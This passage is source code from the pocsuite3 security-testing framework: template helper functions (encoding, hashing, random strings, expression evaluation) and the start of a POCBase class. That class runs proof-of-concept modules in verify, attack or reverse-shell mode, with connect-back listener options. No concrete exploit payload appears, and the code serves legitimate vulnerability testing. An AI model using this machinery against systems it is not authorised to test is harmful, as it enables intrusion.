import base64 as py_built_in_base64
import binascii
import datetime
import gzip as py_built_in_gzip
import hashlib
import hmac as py_hmac
import html
import inspect
import random
import re
import string
import time
import urllib.parse
import zlib as py_built_in_zlib
from functools import wraps
from typing import get_type_hints, Union

import chardet
from packaging.version import parse as parse_version
from pocsuite3.lib.core.log import LOGGER as logger
from pocsuite3.lib.yaml.nuclei.protocols.common.expressions.safe_eval import safe_eval

UNRESOLVED_VARIABLE = '---UNRESOLVED-VARIABLE---'


class Marker:
    # General marker (open/close)
    General = "§"
    # ParenthesisOpen marker - begin of a placeholder
    ParenthesisOpen = "{{"
    # ParenthesisClose marker - end of a placeholder
    ParenthesisClose = "}}"

    def extract_timeout_value(raw_timeout: str) -> int:
        match = re.search(r'@timeout:?(\d+)s', raw_timeout, re.IGNORECASE)
        if match:
            return int(match.group(1))
        return None


def auto_convert_types(func):
    @wraps(func)
    def check_and_convert_args(*args, **kwargs):
        # Get the function's parameter names and types
        signature = inspect.signature(func)
        parameter_types = get_type_hints(func)

        # Convert args to a list so we can modify its elements
        args_list = list(args)

        # Check and convert positional arguments
        for i, (arg_name, arg_value) in enumerate(zip(signature.parameters.keys(), args)):
            arg_type = parameter_types.get(arg_name)
            if arg_type and not isinstance(arg_value, arg_type):
                try:
                    if arg_type is str and isinstance(arg_value, bytes):
                        try:
                            encoding = chardet.detect(arg_value)['encoding'] or 'utf-8'
                            args_list[i] = arg_value.decode(encoding)
                        except Exception:
                            args_list[i] = str(arg_value)
                    elif arg_type is bytes and isinstance(arg_value, str):
                        args_list[i] = arg_value.encode('utf-8')
                except ValueError:
                    pass
        # Check and convert keyword arguments
        for arg_name, arg_value in kwargs.items():
            arg_type = parameter_types.get(arg_name)
            if arg_type and not isinstance(arg_value, arg_type):
                try:
                    if arg_type is str and isinstance(arg_value, bytes):
                        try:
                            encoding = chardet.detect(arg_value)['encoding'] or 'utf-8'
                            kwargs[arg_name] = arg_value.decode(encoding)
                        except Exception:
                            kwargs[arg_name] = str(arg_value)
                    elif arg_type is bytes and isinstance(arg_value, str):
                        kwargs[arg_name] = arg_value.encode('utf-8')
                except ValueError:
                    pass
        # Call the original function with the potentially converted arguments
        return func(*args_list, **kwargs)

    return check_and_convert_args


def aes_gcm(key: Union[bytes, str], plaintext: Union[bytes, str]) -> bytes:
    """
    AES GCM encrypts a string with key

    Example:
        Input: {{hex_encode(aes_gcm("AES256Key-32Characters1234567890", "exampleplaintext"))}}
        Output: ec183a153b8e8ae7925beed74728534b57a60920c0b009eaa7608a34e06325804c096d7eebccddea3e5ed6c4
    """
    # TODO
    raise NotImplementedError


def base64(src: Union[bytes, str]) -> str:
    """Base64 encodes a string

    Example:
        Input: base64("Hello")
        Output: SGVsbG8=
    """
    if not isinstance(src, bytes):
        src = src.encode('utf-8')
    return py_built_in_base64.b64encode(src).decode('utf-8')


def base64_decode(src: Union[bytes, str]) -> bytes:
    """
    Base64 decodes a string

    Example:
        Input: base64_decode("SGVsbG8=")
        Output: b"Hello"
    """
    return py_built_in_base64.b64decode(src)


def base64_py(src: Union[bytes, str]) -> str:
    """
    Encodes string to base64 like python (with new lines)

    Example:
        Input: base64_py("Hello")
        Output: "SGVsbG8=\n"
    """
    if not isinstance(src, bytes):
        src = src.encode('utf-8')
    return py_built_in_base64.encodebytes(src).decode('utf-8')


@auto_convert_types
def concat(*arguments: str) -> str:
    """
    Concatenates the given number of arguments to form a string

    Example:
        Input: concat("Hello", 123, "world)
        Output: Hello123world
    """
    return ''.join(map(str, arguments))


@auto_convert_types
def compare_versions(version_to_check: str, *constraints: str) -> bool:
    """
    Compares the first version argument with the provided constraints

    Example:
        Input: compare_versions('v1.0.0', '>v0.0.1', '<v1.0.1')
        Output: True
    """
    v1 = parse_version(version_to_check)
    for constraint in constraints:
        constraint = constraint.replace('==', '=')
        operator = re.findall(r'^[<>=]*', constraint)[0]
        if not operator:
            operator = '='
        v2 = parse_version(constraint.lstrip('<>='))
        if v1 < v2 and operator not in ['<', '<=']:
            return False
        elif v1 == v2 and operator not in ['=', '<=', '>=']:
            return False
        elif v1 > v2 and operator not in ['>', '>=']:
            return False
    return True


@auto_convert_types
def contains(inp: str, substring: str) -> bool:
    """
    Verifies if a string contains a substring

    Example:
        Input: contains("Hello", "lo")
        Output: True
    """
    return substring in inp


@auto_convert_types
def contains_all(inp: str, *substrings: str) -> bool:
    """
    Verify if any input contains all the substrings

    Example:
        Input: contains_all("Hello everyone", "lo", "every")
        Output: True
    """
    return all(map(lambda s: s in inp, substrings))


@auto_convert_types
def contains_any(inp: str, *substrings: str) -> bool:
    """
    Verifies if an input contains any of substrings

    Example:
        Input: contains_any("Hello everyone", "abc", "llo")
        Output: True
    """
    return any(map(lambda s: s in inp, substrings))


def dec_to_hex(number: Union[str, int]) -> str:
    """
    Transforms the input number into hexadecimal format

    Example:
        Input: dec_to_hex(7001)
        Output: 1b59
    """
    if not isinstance(number, int):
        number = int(number)
    return hex(number)[2:]


def hex_to_dec(hex_number: Union[str, int]) -> int:
    """
    Transforms the input hexadecimal number into decimal format

    Example:
        Input: hex_to_dec("ff")
               hex_to_dec("0xff")
        Output: 255
    """
    return int(str(hex_number), 16)


def bin_to_dec(binary_number: Union[str, int]) -> int:
    """
    Transforms the input binary number into a decimal format

    Example:
        Input: bin_to_dec("0b1010")
               bin_to_dec(1010)
        Output: 10
    """
    return int(str(binary_number), 2)


def oct_to_dec(octal_number: Union[str, int]) -> int:
    """
    Transforms the input octal number into a decimal format

    Example:
        Input: oct_to_dec("0o1234567")
               oct_to_dec(1234567)
        Output: 342391
    """
    return int(str(octal_number), 8)


def generate_java_gadget(gadget: str, cmd: str, encoding: str) -> str:
    """
    Generates a Java Deserialization Gadget

    Example:
        Input: generate_java_gadget("dns", "{{interactsh-url}}", "base64")
    """
    # TODO
    raise NotImplementedError


def gzip(inp: Union[str, bytes]) -> bytes:
    """
    Compresses the input using GZip

    Example:
        Input: base64(gzip("Hello"))
        Output: H4sIAI9GUGMC//NIzcnJBwCCidH3BQAAAA==
    """
    if not isinstance(inp, bytes):
        inp = inp.encode('utf-8')
    return py_built_in_gzip.compress(inp)


@auto_convert_types
def gzip_decode(inp: bytes) -> bytes:
    """
    Decompresses the input using GZip

    Example:
        Input: gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000"))
        Output: b"Hello"
    """
    return py_built_in_gzip.decompress(inp)


def zlib(inp: Union[str, bytes]) -> bytes:
    """
    Compresses the input using Zlib

    Example:
        Input: base64(zlib("Hello"))
        Output: eJzzSM3JyQcABYwB9Q==
    """
    if not isinstance(inp, bytes):
        inp = inp.encode('utf-8')
    return py_built_in_zlib.compress(inp)


@auto_convert_types
def zlib_decode(inp: bytes) -> bytes:
    """
    Decompresses the input using Zlib

    Example:
        Input: zlib_decode(hex_decode("789cf248cdc9c907040000ffff058c01f5"))
        Output: b"Hello"
    """
    return py_built_in_zlib.decompress(inp)


@auto_convert_types
def hex_decode(inp: str) -> bytes:
    """
    Hex decodes the given input

    Example:
        Input: hex_decode("6161")
        Output: b"aa"
    """
    return binascii.unhexlify(inp)


def hex_encode(inp: Union[str, bytes]) -> str:
    """
    Hex encodes the given input

    Example:
        Input: hex_encode("aa")
        Output: 6161
    """
    if not isinstance(inp, bytes):
        inp = inp.encode('utf-8')
    return binascii.hexlify(inp).decode('utf-8')


@auto_convert_types
def html_escape(inp: str) -> str:
    """
    HTML escapes the given input

    Example:
        Input: html_escape("<body>test</body>")
        Output: &lt;body&gt;test&lt;/body&gt;
    """
    return html.escape(inp)


@auto_convert_types
def html_unescape(inp: str) -> str:
    """
    HTML un-escapes the given input

    Example:
        Input: html_unescape("&lt;body&gt;test&lt;/body&gt;")
        Output: <body>test</body>
    """
    return html.unescape(inp)


def md5(inp: Union[str, bytes]) -> str:
    """
    Calculates the MD5 (Message Digest) hash of the input

    Example:
        Input: md5("Hello")
        Output: 8b1a9953c4611296a827abf8c47804d7
    """
    if not isinstance(inp, bytes):
        inp = inp.encode('utf-8')
    m = hashlib.md5()
    m.update(inp)
    return m.hexdigest()


@auto_convert_types
def mmh3(inp: str) -> str:
    """
    Calculates the MMH3 (MurmurHash3) hash of an input

    Example:
        Input: mmh3("Hello")
        Output: "316307400"
    """

    try:
        import mmh3 as py_mmh3
    except ImportError:
        logger.error('Python extension for MurmurHash (MurmurHash3) is not installed. '
                     'Reason: https://github.com/knownsec/pocsuite3/issues/359, '
                     'You can locate the packages here: https://pypi.org/project/mmh3/')
        return "0"

    return str(py_mmh3.hash(inp))


def print_debug(*args) -> None:
    """
    Prints the value of a given input or expression. Used for debugging.

    Example:
        Input: print_debug(1+2, "Hello")
        Output: 3 Hello
    """
    # TODO
    raise NotImplementedError


def rand_base(length: int, optional_charset: str = string.ascii_letters + string.digits) -> str:
    """
    Generates a random sequence of given length string from an optional charset (defaults to letters and numbers)

    Example:
        Input: rand_base(5, "abc")
        Output: caccb
    """
    return ''.join(random.choice(optional_charset) for _ in range(length))


def rand_char(optional_charset: str = string.ascii_letters + string.digits) -> str:
    """
    Generates a random character from an optional character set (defaults to letters and numbers)

    Example:
        Input: rand_char("abc")
        Output: a
    """
    return random.choice(optional_charset)


def rand_int(optional_min: int = 0, optional_max: int = 2147483647) -> int:
    """
    Generates a random integer between the given optional limits (defaults to 0 - MaxInt32)

    Example:
        Input: rand_int(1, 10)
        Output: 6
    """
    return random.randint(optional_min, optional_max)


def rand_text_alpha(length: int, optional_bad_chars: str = '') -> str:
    """
    Generates a random string of letters, of given length, excluding the optional cutset characters

    Example:
        Input: rand_text_alpha(10, "abc")
        Output: WKozhjJWlJ
    """
    charset = ''.join(i if i not in optional_bad_chars else '' for i in string.ascii_letters)
    return ''.join(random.choice(charset) for _ in range(length))


def rand_text_alphanumeric(length: int, optional_bad_chars: str = '') -> str:
    """
    Generates a random alphanumeric string, of given length without the optional cutset characters

    Example:
        Input: rand_text_alphanumeric(10, "ab12")
        Output: NthI0IiY8r
    """
    charset = ''.join(i if i not in optional_bad_chars else '' for i in string.ascii_letters + string.digits)
    return ''.join(random.choice(charset) for _ in range(length))


def rand_text_numeric(length: int, optional_bad_numbers: str = '') -> str:
    """
    Generates a random numeric string of given length without the optional set of undesired numbers

    Example:
        Input: rand_text_numeric(10, 123)
        Output: 0654087985
    """
    charset = ''.join(i if i not in optional_bad_numbers else '' for i in string.digits)
    return ''.join(random.choice(charset) for _ in range(length))


@auto_convert_types
def regex(pattern: str, inp: str) -> bool:
    """
    Tests the given regular expression against the input string

    Example:
        Input: regex("H([a-z]+)o", "Hello")
        Output: True
    """
    return list(filter(lambda item: item.strip() != "", re.findall(pattern, inp, re.IGNORECASE))) != []


@auto_convert_types
def remove_bad_chars(inp: str, cutset: str) -> str:
    """
    Removes the desired characters from the input

    Example:
        Input: remove_bad_chars("abcd", "bc")
        Output: ad
    """
    return ''.join(i if i not in cutset else '' for i in inp)


@auto_convert_types
def repeat(inp: str, count: int) -> str:
    """
    Repeats the input string the given amount of times

    Example:
        Input: repeat("../", 5)
        Output: ../../../../../
    """
    return inp * count


@auto_convert_types
def replace(inp: str, old: str, new: str) -> str:
    """
    Replaces a given substring in the given input

    Example:
        Input: replace("Hello", "He", "Ha")
        Output: Hallo
    """
    return inp.replace(old, new)


@auto_convert_types
def replace_regex(source: str, pattern: str, replacement: str) -> str:
    """
    Replaces substrings matching the given regular expression in the input

    Example:
        Input: replace_regex("He123llo", "(\\d+)", "")
        Output: Hello
    """
    return re.sub(pattern, replacement, source)


@auto_convert_types
def reverse(inp: str) -> str:
    """
    Reverses the given input

    Example:
        Input: reverse("abc")
        Output: cba
    """
    return inp[::-1]


def sha1(inp: Union[bytes, str]) -> str:
    """
    Calculates the SHA1 (Secure Hash 1) hash of the input

    Example:
        Input: sha1("Hello")
        Output: f7ff9e8b7bb2e09b70935a5d785e0cc5d9d0abf0
    """
    if not isinstance(inp, bytes):
        inp = inp.encode('utf-8')

    s = hashlib.sha1()
    s.update(inp)
    return s.hexdigest()


def sha256(inp: Union[bytes, str]) -> str:
    """
    Calculates the SHA256 (Secure Hash 256) hash of the input

    Example:
        Input: sha256("Hello")
        Output: 185f8db32271fe25f561a6fc938b2e264306ec304eda518007d1764826381969
    """
    if not isinstance(inp, bytes):
        inp = inp.encode('utf-8')

    s = hashlib.sha256()
    s.update(inp)
    return s.hexdigest()


@auto_convert_types
def to_lower(inp: str) -> str:
    """
    Transforms the input into lowercase characters

    Example:
        Input: to_lower("HELLO")
        Output: hello
    """
    return inp.lower()


@auto_convert_types
def to_upper(inp: str) -> str:
    """
    Transforms the input into uppercase characters

    Example:
        Input: to_upper("hello")
        Output: HELLO
    """
    return inp.upper()


@auto_convert_types
def trim(inp: str, cutset: str) -> str:
    """
    Returns a slice of the input with all leading and trailing Unicode code points contained in cutset removed

    Example:
        Input: trim("aaaHelloddd", "ad")
        Output: Hello
    """
    return inp.strip(cutset)


@auto_convert_types
def trim_left(inp: str, cutset: str) -> str:
    """
    Returns a slice of the input with all leading Unicode code points contained in cutset removed

    Example:
        Input: trim_left("aaaHelloddd", "ad")
        Output: Helloddd
    """
    return inp.lstrip(cutset)


@auto_convert_types
def trim_prefix(inp: str, prefix: str) -> str:
    """
    Returns the input without the provided leading prefix string

    Example:
        Input: trim_prefix("aaHelloaa", "aa")
        Output: Helloaa
    """
    if inp.startswith(prefix):
        return inp[len(prefix):]
    return inp


@auto_convert_types
def trim_right(inp: str, cutset: str) -> str:
    """
    Returns a string, with all trailing Unicode code points contained in cutset removed

    Example:
        Input: trim_right("aaaHelloddd", "ad")
        Output: aaaHello
    """
    return inp.rstrip(cutset)


@auto_convert_types
def trim_space(inp: str) -> str:
    """
    Returns a string, with all leading and trailing white space removed, as defined by Unicode

    Example:
        Input: trim_space(" Hello ")
        Output: Hello
    """
    return inp.strip()


@auto_convert_types
def trim_suffix(inp: str, suffix: str) -> str:
    """
    Returns input without the provided trailing suffix string

    Example:
        Input: trim_suffix("aaHelloaa", "aa")
        Output: aaHello
    """
    if inp.endswith(suffix):
        return inp[:-len(suffix)]
    return inp


def unix_time(optional_seconds: int = 0) -> int:
    """
    Returns the current Unix time (number of seconds elapsed since January 1, 1970 UTC) with the added optional seconds

    Example:
        Input: unix_time(10)
        Output: 1639568278
    """
    return int(time.time()) + optional_seconds


@auto_convert_types
def url_decode(inp: str) -> str:
    """
    URL decodes the input string
    Example:
        Input: url_decode("https:%2F%2Fprojectdiscovery.io%3Ftest=1")
        Output: https://projectdiscovery.io?test=1
    """
    return urllib.parse.unquote_plus(inp)


@auto_convert_types
def url_encode(inp: str) -> str:
    """
    URL encodes the input string

    Example:
        Input: url_encode("https://projectdiscovery.io/test?a=1")
        Output: https%3A%2F%2Fprojectdiscovery.io%2Ftest%3Fa%3D1
    """
    return urllib.parse.quote_plus(inp)


def wait_for(seconds: int) -> bool:
    """
    Pauses the execution for the given amount of seconds

    Example:
        Input: wait_for(10)
        Output: True
    """
    time.sleep(seconds)
    return True


@auto_convert_types
def join(separator: str, *elements: str) -> str:
    """
    Joins the given elements using the specified separator

    Example:
        Input: join("_", 123, "hello", "world")
        Output: 123_hello_world
    """
    return separator.join(map(str, elements))


def hmac(algorithm: str, data: Union[bytes, str], secret: Union[bytes, str]) -> str:
    """
    hmac function that accepts a hashing function type with data and secret

    Example:
        Input: hmac("sha1", "test", "scrt")
        Output: 8856b111056d946d5c6c92a21b43c233596623c6
    """
    if not isinstance(data, bytes):
        data = data.encode('utf-8')
    if not isinstance(secret, bytes):
        secret = secret.encode('utf-8')

    return py_hmac.new(secret, data, algorithm).hexdigest()


def date_time(date_time_format: str, optional_unix_time: int = int(time.time())) -> str:
    """
    Returns the formatted date time using simplified or go style layout for the current or the given unix time

    Example:
        Input: date_time("%Y-%m-%d %H:%M")
               date_time("%Y-%m-%d %H:%M", 1654870680)
        Output: 2022-06-10 14:18
    """
    return datetime.datetime.utcfromtimestamp(optional_unix_time).strftime(date_time_format)


@auto_convert_types
def to_unix_time(inp: str, layout: str = "%Y-%m-%d %H:%M:%S") -> int:
    """
    Parses a string date time using default or user given layouts, then returns its Unix timestamp

    Example:
        Input: to_unix_time("2022-01-13 16:30:10")
        Output: 1642091410
    """
    return int(time.mktime(datetime.datetime.strptime(inp, layout).timetuple()))


@auto_convert_types
def starts_with(inp: str, *prefix: str) -> bool:
    """
    Checks if the string starts with any of the provided substrings

    Example:
        Input: starts_with("Hello", "He")
        Output: True
    """
    return any(inp.startswith(p) for p in prefix)


@auto_convert_types
def line_starts_with(inp: str, *prefix: str) -> bool:
    """
    Checks if any line of the string starts with any of the provided substrings

    Example:
        Input: line_starts_with("Hi\nHello", "He")
        Output: True
    """
    for line in inp.splitlines():
        for p in prefix:
            if line.startswith(p):
                return True
    return False


@auto_convert_types
def ends_with(inp: str, *suffix: str) -> bool:
    """
    Checks if the string ends with any of the provided substrings

    Example:
        Input: ends_with("Hello", "lo")
        Output: True
    """
    return any(inp.endswith(s) for s in suffix)


@auto_convert_types
def line_ends_with(inp: str, *suffix: str) -> bool:
    """
    Checks if any line of the string ends with any of the provided substrings

    Example:
        Input: line_ends_with("Hello\nHi", "lo")
        Output: True
    """
    for line in inp.splitlines():
        for s in suffix:
            if line.endswith(s):
                return True
    return False


def evaluate(inp: str, dynamic_values: dict = None) -> str:
    """
    evaluate checks if the match contains a dynamic variable, for each
    found one we will check if it's an expression and can be compiled,
    it will be evaluated and the results will be returned.
    """

    if dynamic_values is None:
        dynamic_values = {}

    variables = {
        'aes_gcm': aes_gcm,
        'base64': base64,
        'base64_decode': base64_decode,
        'base64_py': base64_py,
        'concat': concat,
        'compare_versions': compare_versions,
        'contains': contains,
        'contains_all': contains_all,
        'contains_any': contains_any,
        'dec_to_hex': dec_to_hex,
        'hex_to_dec': hex_to_dec,
        'bin_to_dec': bin_to_dec,
        'oct_to_dec': oct_to_dec,
        'generate_java_gadget': generate_java_gadget,
        'gzip': gzip,
        'gzip_decode': gzip_decode,
        'zlib': zlib,
        'zlib_decode': zlib_decode,
        'hex_decode': hex_decode,
        'hex_encode': hex_encode,
        'html_escape': html_escape,
        'html_unescape': html_unescape,
        'md5': md5,
        'mmh3': mmh3,
        'print_debug': print_debug,
        'rand_base': rand_base,
        'rand_char': rand_char,
        'rand_int': rand_int,
        'rand_text_alpha': rand_text_alpha,
        'rand_text_alphanumeric': rand_text_alphanumeric,
        'rand_text_numeric': rand_text_numeric,
        'regex': regex,
        'remove_bad_chars': remove_bad_chars,
        'repeat': repeat,
        'replace': replace,
        'replace_regex': replace_regex,
        'reverse': reverse,
        'sha1': sha1,
        'sha256': sha256,
        'to_lower': to_lower,
        'to_upper': to_upper,
        'trim': trim,
        'trim_left': trim_left,
        'trim_prefix': trim_prefix,
        'trim_right': trim_right,
        'trim_space': trim_space,
        'trim_suffix': trim_suffix,
        'unix_time': unix_time,
        'url_decode': url_decode,
        'url_encode': url_encode,
        'wait_for': wait_for,
        'join': join,
        'hmac': hmac,
        'date_time': date_time,
        'to_unix_time': to_unix_time,
        'starts_with': starts_with,
        'line_starts_with': line_starts_with,
        'ends_with': ends_with,
        'line_ends_with': line_ends_with,
    }
    variables.update(dynamic_values)
    open_marker, close_marker = Marker.ParenthesisOpen, Marker.ParenthesisClose
    expressions = {}
    max_iterations, iterations = 250, 0
    data = inp

    while iterations <= max_iterations:
        iterations += 1
        index_open_marker = data.find(open_marker)
        if index_open_marker < 0:
            break

        index_open_marker_offset = index_open_marker + len(open_marker)
        should_search_close_marker = True
        close_marker_found = False
        inner_data = data
        skip = index_open_marker_offset

        while should_search_close_marker:
            index_close_marker = inner_data.find(close_marker, skip)
            if index_close_marker < 0:
                should_search_close_marker = False
                continue
            index_close_marker_offset = index_close_marker + len(close_marker)
            potential_match = inner_data[index_open_marker_offset:index_close_marker]
            try:
                result = safe_eval(potential_match, variables)

                if UNRESOLVED_VARIABLE in str(result):
                    return UNRESOLVED_VARIABLE
                expressions[potential_match] = result
                close_marker_found = True
                should_search_close_marker = False
            except Exception:
                import traceback
                traceback.print_exc()
                skip = index_close_marker_offset

        if close_marker_found:
            data = data[index_close_marker_offset:]
        else:
            data = data[index_open_marker_offset:]

    result = inp
    for k, v in expressions.items():
        logger.debug(f'[+] Expressions: {k} -> {v}')
        k = f'{open_marker}{k}{close_marker}'
        if k == inp:
            return v
        elif isinstance(v, bytes):
            if not isinstance(result, bytes):
                result = result.encode()
            k = k.encode()
            result = result.replace(k, v)
        else:
            result = result.replace(k, str(v))
    return result


if __name__ == '__main__':
    print(evaluate("{{to_lower(rand_base(5))}}"))
    print(evaluate("{{base64('World')}}"))
    print(evaluate("{{base64(Hello)}}", {'Hello': 'World'}))



# pylint: disable=E1101
import time
import re
import traceback
import inspect
from collections import OrderedDict

from requests.exceptions import ConnectTimeout, ConnectionError, HTTPError, TooManyRedirects
from pocsuite3.lib.core.common import mosaic, check_port, OrderedSet, get_host_ip
from pocsuite3.lib.core.data import conf, logger
from pocsuite3.lib.core.enums import OUTPUT_STATUS, CUSTOM_LOGGING, ERROR_TYPE_ID, POC_CATEGORY
from pocsuite3.lib.core.exception import PocsuiteValidationException
from pocsuite3.lib.core.interpreter_option import OptString, OptInteger, OptPort
from pocsuite3.lib.request import requests
from pocsuite3.lib.utils import urlparse


class POCBase(object):
    def __init__(self):
        # PoC attributes
        self.vulID = getattr(self, 'vulID', '0')
        self.version = getattr(self, 'version', '1')
        self.author = getattr(self, 'author', '')
        self.vulDate = getattr(self, 'vulDate', '')
        self.createDate = getattr(self, 'createDate', '')
        self.updateDate = getattr(self, 'updateDate', '')
        self.references = getattr(self, 'references', [])
        self.name = getattr(self, 'name', '')
        self.appPowerLink = getattr(self, 'appPowerLink', '')
        self.appName = getattr(self, 'appName', '')
        self.appVersion = getattr(self, 'appVersion', '')
        self.vulType = getattr(self, 'vulType', '')
        self.desc = getattr(self, 'desc', '')
        self.samples = getattr(self, 'samples', [])
        self.install_requires = getattr(self, 'install_requires', [])
        self.dork = getattr(self, 'dork', {})
        self.suricata_request = getattr(self, 'suricata_request', '')
        self.suricata_response = getattr(self, 'suricata_response', '')
        #
        self.type = None
        self.target = None
        self.headers = None
        self.url = None
        self.scheme = None
        self.rhost = None
        self.rport = None
        self.netloc = None
        self.mode = None
        self.params = None
        self.verbose = None
        self.expt = (0, 'None')
        self.current_protocol = getattr(self, "protocol", POC_CATEGORY.PROTOCOL.HTTP)
        self.current_protocol_port = getattr(self, "protocol_default_port", 0)
        self.pocDesc = getattr(self, "pocDesc", "Poc的作者好懒呀！")
        self.host_ip = get_host_ip(check_private=False)

        # gloabl options init
        self.global_options = OrderedDict()
        if self.current_protocol == POC_CATEGORY.PROTOCOL.HTTP:
            self.global_options["target"] = OptString("",
                                                      "Target HTTP, IPv4, IPv6 address or file with ip:port (file://)",
                                                      require=True)
            self.global_options["referer"] = OptString("", "HTTP Referer header value")
            self.global_options["agent"] = OptString("", "HTTP User-Agent header value")
            self.global_options["proxy"] = OptString(
                "", "Use a proxy to connect to the target URL (protocol://host:port)")
            self.global_options["timeout"] = OptInteger(10, "Seconds to wait before timeout connection (default 10)")
        else:
            self.global_options["rhost"] = OptString('', 'The target host', require=True)
            self.global_options["rport"] = OptPort('', 'The target port', require=True)

        # payload options for exploit
        self.payload_options = OrderedDict()
        if hasattr(self, "_shell"):
            self.payload_options["lhost"] = OptString(self.host_ip, "The listen address")
            self.payload_options["lport"] = OptPort(6666, "The listen port")

        self.options = OrderedDict()
        # module options init
        if hasattr(self, "_options"):
            self.options.update(self._options())

    def get_options(self):
        tmp = OrderedDict()
        for k, v in self.options.items():
            tmp[k] = v
        for k, v in self.payload_options.items():
            tmp[k] = v
        for k, v in self.global_options.items():
            tmp[k] = v
        return tmp
        # return self.options.update(self.global_options).update(self.payload_options)

    def get_option(self, name):
        if name not in self.options:
            raise PocsuiteValidationException
        # 处理options中的payload, 将Payload的IP和端口转换
        value = self.options[name].value
        flag = re.search(r'\{0\}.+\{1\}', str(value))
        if flag:
            value = value.format(conf.connect_back_host, conf.connect_back_port)
        return value

    def get_infos(self):
        '''
        得到Poc的信息，返回dict
        :return:
        '''
        fields = ["name", "VulID", "version", "author", "vulDate", "createDate", "updateDate", "references",
                  "appPowerLink", "appName", "appVersion", "vulType", "desc", "pocDesc", "current_protocol"]
        data = {
        }

        for field in fields:
            value = getattr(self, field, None)
            if value:
                data[field] = value

        return data

    def getg_option(self, name):
        if name not in self.global_options:
            raise PocsuiteValidationException
        r = self.global_options[name].value if self.global_options[name].value != "" else 0
        return r

    def getp_option(self, name):
        if name not in self.payload_options:
            raise PocsuiteValidationException
        return self.payload_options[name].value

    def get_category(self):
        return self.category if hasattr(self, 'category') else 'Unknown'

    def set_options(self, kwargs):
        if hasattr(self, 'options'):
            self.options.update(kwargs)
        else:
            self.options = kwargs

    def set_option(self, key, value):
        # if not hasattr(self, 'options'):
        #     self.options = {}
        if key not in self.options:
            raise PocsuiteValidationException("No key " + key)
        self.options[key].__set__("", value)

    def setg_option(self, key, value):
        if key not in self.global_options:
            raise PocsuiteValidationException("No key " + key)
        self.global_options[key].__set__("", value)

    def setp_option(self, key, value):
        if key not in self.payload_options:
            raise PocsuiteValidationException("No key " + key)
        self.payload_options[key].__set__("", value)

    def check_requirement(self, *args):
        for option in args:
            for k, v in option.items():
                if v.require and v.value == "":
                    raise PocsuiteValidationException(
                        "'{key}' must be set, please using command 'set {key}'".format(key=k))
        return True

    def build_url(self, target=''):
        if not target:
            target = self.target
        # https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
        protocol_default_port_map = {
            POC_CATEGORY.PROTOCOL.FTP: 21,
            POC_CATEGORY.PROTOCOL.SSH: 22,
            POC_CATEGORY.PROTOCOL.TELNET: 23,
            POC_CATEGORY.PROTOCOL.REDIS: 6379,
            POC_CATEGORY.PROTOCOL.SMTP: 25,
            POC_CATEGORY.PROTOCOL.DNS: 53,
            POC_CATEGORY.PROTOCOL.SNMP: 161,
            POC_CATEGORY.PROTOCOL.SMB: 445,
            POC_CATEGORY.PROTOCOL.MQTT: 1883,
            POC_CATEGORY.PROTOCOL.MYSQL: 3306,
            POC_CATEGORY.PROTOCOL.RDP: 3389,
            POC_CATEGORY.PROTOCOL.UPNP: 1900,
            POC_CATEGORY.PROTOCOL.AJP: 8009,
            POC_CATEGORY.PROTOCOL.XMPP: 5222,
            POC_CATEGORY.PROTOCOL.WINBOX: 8291,
            POC_CATEGORY.PROTOCOL.MEMCACHED: 11211,
            POC_CATEGORY.PROTOCOL.BACNET: 47808,
            POC_CATEGORY.PROTOCOL.T3: 7001,
        }

        if self.current_protocol_port:
            protocol_default_port_map[self.current_protocol] = self.current_protocol_port

        try:
            pr = urlparse(target)
            is_ipv6 = pr.netloc.startswith('[')
            self.scheme = pr.scheme
            self.rhost = pr.hostname
            self.rport = pr.port or self.current_protocol_port

            # if protocol is not provided and the port endswith 443, we adjust the protocol to https
            if (self.current_protocol not in protocol_default_port_map or
                    self.current_protocol == POC_CATEGORY.PROTOCOL.HTTP):
                if self.scheme not in ['http', 'https']:
                    self.scheme = 'https' if str(self.rport).endswith('443') else 'http'
                self.rport = self.rport if self.rport else 443 if self.scheme == 'https' else 80

            else:
                # adjust protocol
                self.scheme = self.current_protocol.lower()
                # adjust port
                if not self.rport:
                    self.rport = protocol_default_port_map[self.current_protocol]
            self.netloc = f'[{self.rhost}]:{self.rport}' if is_ipv6 else f'{self.rhost}:{self.rport}'
            pr = pr._replace(scheme=self.scheme)
            pr = pr._replace(netloc=self.netloc)
            target = pr.geturl()
        except ValueError:
            pass
        if self.target and self.current_protocol != POC_CATEGORY.PROTOCOL.HTTP and not conf.console_mode:
            self.setg_option("rhost", self.rhost)
            self.setg_option("rport", self.rport)
        return target.rstrip('/')

    def _execute(self):
        if self.mode == 'shell':
            if not hasattr(self, "_shell"):
                raise NotImplementedError
            output = self._shell()
        elif self.mode == 'attack':
            output = self._attack()
        else:
            output = self._verify()

        return output

    def execute(self, target, headers=None, params=None, mode='verify', verbose=True):
        self.target = target
        self.url = self.build_url()
        if self.url != self.target:
            logger.debug(f'auto correct url: {mosaic(self.target)} -> {mosaic(self.url)}')
        # TODO: Thread safe problem in self.headers
        # https://github.com/knownsec/pocsuite3/issues/262
        # The value should not be modified in PoC Plugin !!!
        # Some PoC use this bug as a feature, For the purpose of PoC plugin compatibility, it will not be fixed
        self.headers = headers
        if isinstance(params, dict) or isinstance(params, str):
            self.params = params
        else:
            self.params = {}
        self.mode = mode
        self.verbose = verbose
        self.expt = (0, 'None')
        # TODO
        output = None

        try:
            output = self._execute()

        except NotImplementedError as e:
            self.expt = (ERROR_TYPE_ID.NOTIMPLEMENTEDERROR, e)
            logger.log(CUSTOM_LOGGING.ERROR, 'POC: {0} not defined "{1}" mode'.format(self.name, self.mode))
            output = Output(self)

        except ConnectTimeout as e:
            self.expt = (ERROR_TYPE_ID.CONNECTTIMEOUT, e)
            while conf.retry > 0:
                logger.debug('connect target {0} timeout, retry it.'.format(mosaic(target)))
                try:
                    output = self._execute()
                    break
                except Exception:
                    logger.debug('target {0} retry failed!'.format(mosaic(target)))
                conf.retry -= 1
            if output is None:
                msg = "connect target '{0}' failed!".format(mosaic(target))
                logger.error(msg)
                output = Output(self)

        except HTTPError as e:
            self.expt = (ERROR_TYPE_ID.HTTPERROR, e)
            logger.warn('target {0} HTTPError occurs.'.format(mosaic(target)))
            output = Output(self)

        except ConnectionError as e:
            self.expt = (ERROR_TYPE_ID.CONNECTIONERROR, e)
            msg = "connect target '{0}' failed!".format(mosaic(target))
            logger.error(msg)
            output = Output(self)

        except TooManyRedirects as e:
            self.expt = (ERROR_TYPE_ID.TOOMANYREDIRECTS, e)
            logger.debug(str(e))
